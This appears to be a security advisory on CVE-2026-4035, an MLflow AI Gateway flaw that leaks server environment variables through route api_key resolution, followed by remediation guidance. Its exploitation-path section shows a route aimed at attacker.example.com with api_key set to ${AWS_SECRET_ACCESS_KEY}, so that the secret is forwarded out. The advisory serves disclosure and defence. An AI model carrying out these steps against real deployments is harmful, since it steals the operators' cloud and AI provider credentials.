CVE-2026-4035: MLflow AI Gateway Credential Exfiltration
A critical credential exfiltration vulnerability tracked as CVE-2026-4035 has been disclosed in MLflow's AI Gateway component. Carrying a CVSS v3.1 score of 9.1 (Critical), the flaw enables a remote attacker to extract sensitive server-side environment variables — including API keys for AI provider services such as OpenAI, Anthropic, and Azure OpenAI — by exploiting improper resolution of environment variables within the api_key configuration field of AI Gateway routes.
The vulnerability affects all mlflow/mlflow versions prior to 3.11.0 and was published on June 3, 2026.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-4035 |
| CVSS Score | 9.1 (Critical) |
| CWE Classification | CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor |
| Affected Component | MLflow AI Gateway — route api_key configuration |
| Attack Vector | Network |
| Authentication Required | Low (route access) |
| Primary Impact | Exfiltration of server-side AI provider credentials |
| Fixed Version | mlflow 3.11.0 |
| Source | NVD / NIST |
Technical Details
Root Cause
MLflow's AI Gateway allows administrators to define routes with backend AI provider credentials. When configuring a route, the api_key field supports environment variable substitution syntax (e.g., ${OPENAI_API_KEY}) to avoid embedding secrets directly in configuration files.
The vulnerability arises because this environment variable resolution is performed at request time rather than at server startup, and the resolved value can be reflected or forwarded to an attacker-controlled endpoint if the route is configured to proxy requests to an external URL.
An attacker with sufficient access to configure or modify an AI Gateway route can:
- Set the route's target endpoint to an attacker-controlled server
- Configure
api_keyto reference sensitive environment variables (e.g.,${DATABASE_URL},${AWS_SECRET_ACCESS_KEY}) - Trigger a request through the route
- Receive the resolved credential value at their controlled server via the forwarded
Authorizationheader
Exploitation Path
Attacker (with AI Gateway route write access)
→ Create/modify route: endpoint = attacker.example.com
→ Set api_key = "${AWS_SECRET_ACCESS_KEY}"
→ Trigger request through the route
→ MLflow resolves env var and injects into Authorization header
→ HTTP request forwarded to attacker.example.com
→ Attacker receives: Authorization: Bearer <actual AWS secret>
The CVSS score of 9.1 reflects:
- Attack Vector: Network (remotely exploitable)
- Attack Complexity: Low (straightforward exploitation once route write access is obtained)
- Confidentiality Impact: High (full exposure of secrets stored as environment variables)
- Integrity/Availability Impact: Low-Moderate (credential theft enables downstream abuse)
Affected Configuration Pattern
A vulnerable AI Gateway configuration might look like:
routes:
- name: openai-proxy
route_type: llm/v1/chat
model:
provider: openai
name: gpt-4
config:
openai_api_key: "${OPENAI_API_KEY}"
# Attacker could redirect this to a malicious endpointWhen the gateway processes a request, it resolves ${OPENAI_API_KEY} from the server environment and injects it into the upstream request. If the target endpoint is attacker-controlled, the credential is exfiltrated.
Impact Assessment
| Impact Area | Description |
|---|---|
| AI Provider Key Theft | OpenAI, Anthropic, Azure OpenAI, and other provider API keys exposed |
| Infrastructure Credentials | Any server-side env var accessible — AWS keys, database URLs, service tokens |
| Financial Impact | Stolen AI provider keys enable unauthorized usage at the victim's expense |
| Data Exfiltration | Broader env variable exposure may reveal database credentials and connection strings |
| Lateral Movement | Compromised cloud credentials enable pivoting into cloud infrastructure |
| Supply Chain Risk | MLflow is widely used in ML pipelines — downstream systems may be affected |
MLflow AI Gateway is commonly deployed in enterprise ML platforms, LLM orchestration pipelines, and AI application backends, meaning the blast radius of compromised credentials extends well beyond the MLflow deployment itself.
Affected Systems
| Product | Affected Versions | Fixed Version |
|---|---|---|
| mlflow/mlflow | All versions prior to 3.11.0 | 3.11.0 |
Organizations using MLflow AI Gateway in production — particularly those routing requests to commercial AI providers — should treat this as an urgent remediation priority.
Remediation
Immediate Actions
-
Upgrade to MLflow 3.11.0 or later — The fix prevents environment variable resolution from being forwarded to externally-configured route endpoints:
pip install --upgrade mlflow>=3.11.0 # or with conda: conda install -c conda-forge mlflow>=3.11.0 -
Audit AI Gateway route configurations — Review all configured routes for:
- External or unexpected endpoint URLs
- Use of environment variable expansion in
api_keyfields - Routes added without explicit authorization
-
Rotate exposed credentials — If exploitation cannot be ruled out, rotate all environment variables that could have been accessed through AI Gateway routes, including:
- AI provider API keys (OpenAI, Anthropic, Cohere, Azure OpenAI, etc.)
- Cloud credentials stored as environment variables
- Database connection strings
-
Restrict AI Gateway route write access — Limit which users and service accounts can create or modify AI Gateway routes. Apply least-privilege access controls at the MLflow authentication layer.
-
Monitor for anomalous route configurations — Implement audit logging for AI Gateway route changes and alert on unexpected external endpoints.
Defense-in-Depth for MLflow Deployments
Priority 1: Upgrade to mlflow 3.11.0 immediately
Priority 2: Rotate all AI provider API keys and cloud credentials
Priority 3: Audit route configurations for malicious or unexpected endpoints
Priority 4: Enable MLflow authentication and restrict route write permissions
Priority 5: Deploy network egress filtering to block unexpected outbound routes
Priority 6: Implement secret management (Vault, AWS Secrets Manager) instead of env vars
MLops Security Context
AI Gateway components present a unique attack surface in MLops pipelines because they act as credential brokers between applications and AI provider APIs. Unlike traditional web applications, these systems are often deployed with broad environment access and may have relaxed security assumptions rooted in internal-tool deployments.
As organizations scale AI infrastructure, misconfigured or exploited AI Gateways can become high-value targets for:
| Threat | Description |
|---|---|
| API Key Theft for Resale | Stolen AI provider keys traded on underground markets |
| Unauthorized AI Usage | Leveraging victim's keys for compute-heavy AI tasks |
| Cloud Credential Pivot | Env vars often include cloud credentials for infrastructure access |
| ML Pipeline Poisoning | Credential access may enable modification of training data or model artifacts |
The CISA AI Security Guidelines and OWASP LLM Top 10 both highlight credential management as a critical risk in AI/ML deployments.
Key Takeaways
- CVE-2026-4035 is a CVSS 9.1 critical flaw in MLflow AI Gateway enabling server-side environment variable exfiltration via attacker-controlled route endpoints
- All mlflow/mlflow versions prior to 3.11.0 are affected — upgrade immediately
- The vulnerability targets the
api_keyenvironment variable resolution mechanism used to inject credentials into proxied AI provider requests - Organizations should rotate all AI provider keys and cloud credentials if exploitation cannot be ruled out
- Apply least-privilege access controls to AI Gateway route management to limit who can configure route endpoints